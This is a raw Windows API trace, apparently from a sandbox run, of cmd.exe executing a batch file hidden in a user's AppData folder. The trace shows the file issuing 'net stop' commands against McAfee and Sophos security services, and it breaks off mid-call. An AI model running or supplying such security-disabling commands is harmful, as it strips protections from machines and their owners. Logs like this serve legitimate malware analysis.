GetEnvironmentStringsW () returned 0x3f8408* [0037.985] GetProcessHeap () returned 0x3e0000 [0037.985] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.985] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.985] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0037.985] GetProcessHeap () returned 0x3e0000 [0037.985] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.985] GetEnvironmentStringsW () returned 0x3f8408* [0037.985] GetProcessHeap () returned 0x3e0000 [0037.985] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.985] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.985] GetProcessHeap () returned 0x3e0000 [0037.985] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0037.985] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0037.985] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.985] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0037.985] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.986] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0037.986] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.986] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0037.986] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.986] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0037.986] SetConsoleInputExeNameW () returned 0x1 [0037.986] GetConsoleOutputCP () returned 0x1b5 [0037.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0037.986] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0037.987] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0037.987] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.987] SetFilePointer (in: hFile=0x78, lDistanceToMove=1074, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x432 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7488 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7358 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7230 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71c8 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb0 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e80 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0037.987] GetProcessHeap () returned 0x3e0000 [0037.987] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0037.987] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.987] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x432 [0037.988] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x148f, lpOverlapped=0x0) returned 1 [0037.988] SetFilePointer (in: hFile=0x78, lDistanceToMove=1101, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44d [0037.988] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop McTaskManager /y\r\nΓÇ¥ /y\r\nerviceΓÇ¥ /y\r\nfailures\r\nnded\r\n") returned 27 [0037.988] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.988] GetFileType (hFile=0x78) returned 0x1 [0037.988] _get_osfhandle (_FileHandle=3) returned 0x78 [0037.988] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44d [0037.988] GetProcessHeap () returned 0x3e0000 [0037.988] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0037.988] GetProcessHeap () returned 0x3e0000 [0037.988] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0037.988] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0037.988] GetProcessHeap () returned 0x3e0000 [0037.988] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3f6a58 [0037.988] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x36) returned 0x3f3ff0 [0037.989] _tell (_FileHandle=3) returned 1101 [0037.989] _close (_FileHandle=3) returned 0 [0037.989] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0037.989] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0037.989] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0037.989] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0037.989] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0037.989] _wcsicmp (_String1="net", _String2="CD") returned 11 [0037.989] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0037.989] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0037.989] _wcsicmp (_String1="net", _String2="REN") returned -4 [0037.989] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0037.989] _wcsicmp (_String1="net", _String2="SET") returned -5 [0037.989] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0037.989] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0037.989] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0037.989] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0037.989] _wcsicmp (_String1="net", _String2="MD") returned 1 [0037.989] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0037.989] _wcsicmp (_String1="net", _String2="RD") returned -4 [0037.989] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0037.989] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0037.989] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0037.989] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0037.989] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0037.989] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0037.989] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0037.990] _wcsicmp (_String1="net", _String2="VER") returned -8 [0037.990] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0037.990] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0037.990] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0037.990] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0037.990] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0037.990] _wcsicmp (_String1="net", _String2="START") returned -5 [0037.990] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0037.990] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0037.990] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0037.990] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0037.990] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0037.990] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0037.990] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0037.990] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0037.990] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0037.990] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0037.990] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0037.990] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0037.990] SetErrorMode (uMode=0x0) returned 0x1 [0037.990] GetProcessHeap () returned 0x3e0000 [0037.990] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0037.990] GetProcessHeap () returned 0x3e0000 [0037.990] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0037.990] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.990] GetProcessHeap () returned 0x3e0000 [0037.990] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d58 [0037.990] GetProcessHeap () returned 0x3e0000 [0037.990] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e80 [0037.991] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e80, Size=0x122) returned 0x3f6e80 [0037.991] GetProcessHeap () returned 0x3e0000 [0037.991] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e80) returned 0x122 [0037.991] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.991] GetProcessHeap () returned 0x3e0000 [0037.991] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0037.991] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0037.991] GetProcessHeap () returned 0x3e0000 [0037.991] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0037.991] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.991] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.991] GetLastError () returned 0x2 [0037.991] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.991] GetLastError () returned 0x2 [0037.991] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.991] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.991] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.991] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.992] GetLastError () returned 0x2 [0037.992] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.992] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.992] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.992] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb0 [0037.992] GetProcessHeap () returned 0x3e0000 [0037.992] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x3e) returned 0x3f8278 [0037.992] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f71c8 [0037.992] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f71d0, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0037.992] SetErrorMode (uMode=0x0) returned 0x1 [0037.992] GetProcessHeap () returned 0x3e0000 [0037.992] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f71c8, Size=0x5c) returned 0x3f71c8 [0037.992] GetProcessHeap () returned 0x3e0000 [0037.992] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f71c8) returned 0x5c [0037.992] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.992] GetProcessHeap () returned 0x3e0000 [0037.992] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f7230 [0037.992] GetProcessHeap () returned 0x3e0000 [0037.992] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7358 [0037.992] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7358, Size=0x122) returned 0x3f7358 [0037.992] GetProcessHeap () returned 0x3e0000 [0037.992] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7358) returned 0x122 [0037.992] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.993] GetProcessHeap () returned 0x3e0000 [0037.993] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7488 [0037.993] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7488, Size=0x76) returned 0x3f7488 [0037.993] GetProcessHeap () returned 0x3e0000 [0037.993] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7488) returned 0x76 [0037.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.993] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.993] GetLastError () returned 0x2 [0037.993] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.993] GetLastError () returned 0x2 [0037.993] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.993] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7508 [0037.993] FindClose (in: hFindFile=0x3f7508 | out: hFindFile=0x3f7508) returned 1 [0037.993] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.993] GetLastError () returned 0x2 [0037.993] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f7508 [0037.994] FindClose (in: hFindFile=0x3f7508 | out: hFindFile=0x3f7508) returned 1 [0037.994] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.994] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0037.994] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0037.994] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0037.994] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3f4298 [0037.994] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0037.994] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop McTaskManager /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop McTaskManager /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop McTaskManager /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xb84, dwThreadId=0xb88)) returned 1 [0037.997] CloseHandle (hObject=0x78) returned 1 [0037.997] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0037.997] GetProcessHeap () returned 0x3e0000 [0037.997] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.997] GetEnvironmentStringsW () returned 0x3f8408* [0037.997] GetProcessHeap () returned 0x3e0000 [0037.998] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.998] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.998] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0038.162] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0038.162] CloseHandle (hObject=0x74) returned 1 [0038.162] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0038.162] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0038.162] GetProcessHeap () returned 0x3e0000 [0038.162] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.162] GetEnvironmentStringsW () returned 0x3f8408* [0038.162] GetProcessHeap () returned 0x3e0000 [0038.162] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.162] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.162] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0038.162] GetProcessHeap () returned 0x3e0000 [0038.162] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.163] GetEnvironmentStringsW () returned 0x3f8408* [0038.163] GetProcessHeap () returned 0x3e0000 [0038.163] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.163] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.163] GetProcessHeap () returned 0x3e0000 [0038.163] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0038.163] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0038.163] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.163] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0038.163] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.163] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0038.163] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.163] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0038.163] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.163] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0038.164] SetConsoleInputExeNameW () returned 0x1 [0038.164] GetConsoleOutputCP () returned 0x1b5 [0038.164] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0038.164] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0038.165] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0038.165] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.165] SetFilePointer (in: hFile=0x74, lDistanceToMove=1101, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44d [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7488 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7358 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7230 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71c8 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb0 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e80 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0038.165] GetProcessHeap () returned 0x3e0000 [0038.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0038.165] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.166] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44d [0038.166] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1474, lpOverlapped=0x0) returned 1 [0038.166] SetFilePointer (in: hFile=0x74, lDistanceToMove=1146, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x47a [0038.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=45, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥ /y\r\n/y\r\nfailures\r\nnded\r\n") returned 45 [0038.166] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.166] GetFileType (hFile=0x74) returned 0x1 [0038.166] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.166] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 